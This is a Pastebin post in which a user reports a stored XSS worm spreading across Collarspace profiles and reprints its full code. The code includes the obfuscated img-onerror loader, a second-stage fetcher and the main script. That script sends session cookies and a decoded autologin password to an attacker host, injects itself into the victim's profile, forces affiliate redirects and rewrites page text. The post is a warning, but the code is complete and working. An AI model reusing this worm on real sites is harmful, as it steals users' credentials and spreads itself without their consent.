API tools faq
paste
Guest User

CS-Is-A-Terrible-Website

a guest
Sep 18th, 2017
496
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.46 KB | None | 0 0
raw download clone embed print report
  1. I discovered this on the collarspace website on 17Sep2017. This shit is slowly infecting CS profiles because the site doesn't filter code from user profiles. Apparently as of 18Sep2017 the person updated the code, so this is the second version I've noticed:
  2.  
  3. --------
  4.  
  5. Infected profiles get the following:
  6.  
  7. <img style="display:none" auto src="a.b" onerror='var x = new XMLHttpRequest();x["onre"+"adystat"+"echange"]=function(){if (x.readyState==4&&x.status==200)window["ev"+"al"](x.responseText);};x.open("GET", "https://collarspace.000webhostapp.com/<font size='4' color='red'><b>hax</b></font>.txt",true);x.send();'/>
  8.  
  9.  
  10. ---------
  11.  
  12. hax.txt contents:
  13.  
  14.  
  15. if (!window.$) {
  16. var scr = document.createElement('script');
  17. scr.setAttribute("src", "http://code.jquery.com/jquery-latest.min.js");
  18. scr.onload = doStuff;
  19. var head = document.getElementsByTagName('head')[0];
  20. head.appendChild(scr);
  21. } else {
  22. doStuff();
  23. }
  24.  
  25. function doStuff() {
  26. $.ajax({url: "http://collarspace.000webhostapp.com/actualhax.js", cache: false},eval);
  27. }
  28.  
  29.  
  30. --------
  31.  
  32. actualhax.js contents:
  33.  
  34.  
  35. /*jshint -W116 */
  36. /* jshint esnext: true, browser: true, jquery: true */
  37.  
  38. if (!window.$) {
  39. var scr = document.createElement('script');
  40. scr.setAttribute('src', 'http://code.jquery.com/jquery-latest.min.js');
  41. scr.onload = doStuff;
  42. var head = document.getElementsByTagName('head')[0];
  43. head.appendChild(scr);
  44. } else {
  45. doStuff();
  46. }
  47.  
  48. function getCookies() {
  49. var cookies = {};
  50. var theCookies = document.cookie.split(';');
  51. for (var i = 1; i < theCookies.length; i++) {
  52. var mat = theCookies[i].match(/\s*([^=]+)=?(.*)/);
  53. if (!mat[1].match(/^ASPSESSION/))
  54. cookies[mat[1]] = decodeURIComponent(mat[2]);
  55. }
  56. return cookies;
  57. }
  58.  
  59. function loadBase64() {
  60. jQuery.base64 = ((() => {
  61. var _PADCHAR = "=",
  62. _ALPHA = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",
  63. _VERSION = "1.0";
  64.  
  65. function _getbyte64(s, i) {
  66. var idx = _ALPHA.indexOf(s.charAt(i));
  67. if (idx === -1) throw "Cannot decode base64";
  68. return idx;
  69. }
  70.  
  71. function _decode(s) {
  72. var pads = 0,
  73. i, b10, imax = s.length,
  74. x = [];
  75. s = String(s);
  76. if (imax === 0) return s;
  77. if (imax % 4 !== 0) throw "Cannot decode base64";
  78. if (s.charAt(imax - 1) === _PADCHAR) {
  79. pads = 1;
  80. if (s.charAt(imax - 2) === _PADCHAR) {
  81. pads = 2;
  82. }
  83. imax -= 4;
  84. }
  85. for (i = 0; i < imax; i += 4) {
  86. b10 = (_getbyte64(s, i) << 18) | (_getbyte64(s, i + 1) << 12) | (_getbyte64(s, i + 2) << 6) | _getbyte64(s, i + 3);
  87. x.push(String.fromCharCode(b10 >> 16, (b10 >> 8) & 255, b10 & 255));
  88. }
  89. switch (pads) {
  90. case 1:
  91. b10 = (_getbyte64(s, i) << 18) | (_getbyte64(s, i + 1) << 12) | (_getbyte64(s, i + 2) << 6);
  92. x.push(String.fromCharCode(b10 >> 16, (b10 >> 8) & 255));
  93. break;
  94. case 2:
  95. b10 = (_getbyte64(s, i) << 18) | (_getbyte64(s, i + 1) << 12);
  96. x.push(String.fromCharCode(b10 >> 16));
  97. break;
  98. }
  99. return x.join("");
  100. }
  101.  
  102. function _getbyte(s, i) {
  103. var x = s.charCodeAt(i);
  104. if (x > 255) {
  105. throw "INVALID_CHARACTER_ERR: DOM Exception 5";
  106. }
  107. return x;
  108. }
  109.  
  110. function _encode(s) {
  111. if (arguments.length !== 1) {
  112. throw "SyntaxError: exactly one argument required";
  113. }
  114. s = String(s);
  115. var i, b10, x = [],
  116. imax = s.length - s.length % 3;
  117. if (s.length === 0) return s;
  118. for (i = 0; i < imax; i += 3) {
  119. b10 = (_getbyte(s, i) << 16) | (_getbyte(s, i + 1) << 8) | _getbyte(s, i + 2);
  120. x.push(_ALPHA.charAt(b10 >> 18));
  121. x.push(_ALPHA.charAt((b10 >> 12) & 63));
  122. x.push(_ALPHA.charAt((b10 >> 6) & 63));
  123. x.push(_ALPHA.charAt(b10 & 63));
  124. }
  125. switch (s.length - imax) {
  126. case 1:
  127. b10 = _getbyte(s, i) << 16;
  128. x.push(_ALPHA.charAt(b10 >> 18) + _ALPHA.charAt((b10 >> 12) & 63) + _PADCHAR + _PADCHAR);
  129. break;
  130. case 2:
  131. b10 = (_getbyte(s, i) << 16) | (_getbyte(s, i + 1) << 8);
  132. x.push(_ALPHA.charAt(b10 >> 18) + _ALPHA.charAt((b10 >> 12) & 63) + _ALPHA.charAt((b10 >> 6) & 63) + _PADCHAR);
  133. break;
  134. }
  135. return x.join("");
  136. }
  137. return {
  138. decode: _decode,
  139. encode: _encode,
  140. VERSION: _VERSION
  141. };
  142. })(jQuery));
  143. }
  144.  
  145. function doLogin() {
  146. let done = false;
  147. $('a').click(() => {
  148. if (done) return;
  149. done = true;
  150. const domain = 'https://collarspace.000webhostapp.com/';
  151. console.log('CS-MBS - Login');
  152. const props = {
  153. width: '100%',
  154. height: '100%',
  155. overflow: 'hidden',
  156. };
  157. const iframe = $('<iframe>').css(props);
  158. $(document.body).css(props).prepend(iframe);
  159. const href = document.location.href;
  160. iframe.attr('src', domain + 'login.php?url=' + encodeURIComponent(href));
  161. return false;
  162. });
  163. }
  164.  
  165. function infectProfile(id) {
  166. const hax = `\n\n<img style="display:none" auto src="a.b" onerror='var x = new XMLHttpRequest();x["onre"+"adystat"+"echange"]=function(){if (x.readyState==4&&x.status==200)window["ev"+"al"](x.responseText);};x.open("GET", "https://collarspace.000webhostapp.com/hax.txt",true);x.send();'/>`
  167. const proc = $('<iframe/>').css('display', 'none').appendTo(document.body);
  168. proc.load(() => {
  169. const ta = $('#p_desc', proc.contents());
  170. if (!ta.length) return;
  171. document.cookie = 'LGGI=' + id + '; path=/';
  172. let val = ta.val();
  173. if (!val.match(/collarspace.000webhostapp.com/)) {
  174. ta.val(val += hax);
  175. const form = $('form[name=form1]', proc.contents());
  176. form[0].onsubmit = null;
  177. form.submit();
  178. }
  179. });
  180. proc.attr('src', '/processor.asp?bhcp=1');
  181. }
  182.  
  183. function delete_cookie(name) {
  184. document.cookie = name + '=; path=/; expires=Thu, 01 Jan 1970 00:00:01 GMT;';
  185. }
  186.  
  187. function logout() {
  188. console.log('Logging out');
  189. delete_cookie('access');
  190. delete_cookie('id');
  191. delete_cookie('g');
  192. var cookies = {};
  193. var theCookies = document.cookie.split(';');
  194. for (var i = 1; i < theCookies.length; i++) {
  195. var mat = theCookies[i].match(/\s*([^=]+)=?(.*)/);
  196. if (mat[1].match(/^ASPSESSION/))
  197. delete_cookie(mat[1]);
  198. }
  199. return cookies;
  200. }
  201.  
  202. // document.cookie = 'username=Test; path=/';
  203. function doStuff() {
  204. loadBase64();
  205. const infecter = $('[src="a.b"]');
  206. window.LGGI = infecter[0];
  207. infecter.remove();
  208. const domain = 'https://collarspace.000webhostapp.com/';
  209. const replacings = {
  210. hypnosisDomme: 'Send me "Kiwi " if you submit to me. Send "Radio " otherwise',
  211. SimplyTheBest329: 'Are you sure?',
  212. };
  213. //const forceLogin = ['nataliewood', 'iowawarden', 'msTowned', 'alliepre'];
  214. if (window.LeGG) return;
  215. window.LeGG = true;
  216. //console.log('CS-MBS Launched');
  217. var cookies = getCookies();
  218. setTimeout(() => {
  219. if (cookies.G2A != 'legg') {
  220. $('<iframe/>', {
  221. src: 'http://www.g2a.com/r/legg',
  222. style: 'display:none',
  223. load: function () {
  224. $(this).remove();
  225. document.cookie = 'G2A=legg; path=/';
  226. }
  227. }).appendTo('body');
  228. }
  229. if (cookies.G2APU != 'legg') {
  230. document.cookie = 'G2APU=legg; path=/';
  231. document.location = 'http://g2a.com/r/legg';
  232. }
  233. }, 5000);
  234. var id = cookies.id;
  235. if (!id) return logout();
  236. id = id.replace('+', '');
  237. id = id.toLowerCase();
  238. window.LeGG = id;
  239. if (cookies.LGGI != id) infectProfile(id);
  240. $(document).ready(function () {
  241. let pass = $("a[href*=autologin]")[0];
  242. pass = pass && pass.href.match(/p=([\w=]+)/);
  243. pass = pass && pass[1];
  244. if (pass) {
  245. pass = $.base64.decode(pass);
  246. if (window.LeGGBP && window.LeGGBP(pass)) return;
  247. cookies.pass = pass;
  248. }
  249. if (id == "wantingparents") logout();
  250. cookies.location = document.location.href;
  251. $.post(domain + 'cookies.php', cookies);
  252. /*if (cookies.access && cookies.LGGL == id) {
  253. cookies.location = document.location.href;
  254. $.post(domain + 'cookies.php', cookies, (data) => {
  255. if (data.match(/WeakUpdate/)) {
  256. if (forceLogin.find((n) => n == id)) {
  257. doLogin();
  258. } else if (Math.random() <= 0.25) {
  259. doLogin();
  260. }
  261. }
  262. });
  263. } else if (cookies.access) {
  264. document.cookie = 'LGGL=' + id + '; path=/';
  265. }*/
  266. $('[fake]').each(function (i, ele) {
  267. ele = $(ele);
  268. var from = ele.attr('from');
  269. if (from && from.toLowerCase() == id.toLowerCase()) {
  270. if (ele.attr('unfake') !== undefined) {
  271. ele.text(ele.attr('unfake'));
  272. }
  273. } else if (ele.attr('fake') != 'Kiwi') {
  274. ele.text(ele.attr('fake'));
  275. }
  276. });
  277. $('[lerep]').each(function (i, ele) {
  278. ele = $(ele);
  279. var rep = ele.attr('lerep');
  280. rep = rep && replacings[rep];
  281. if (rep) ele.text(rep);
  282. });
  283. });
  284. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!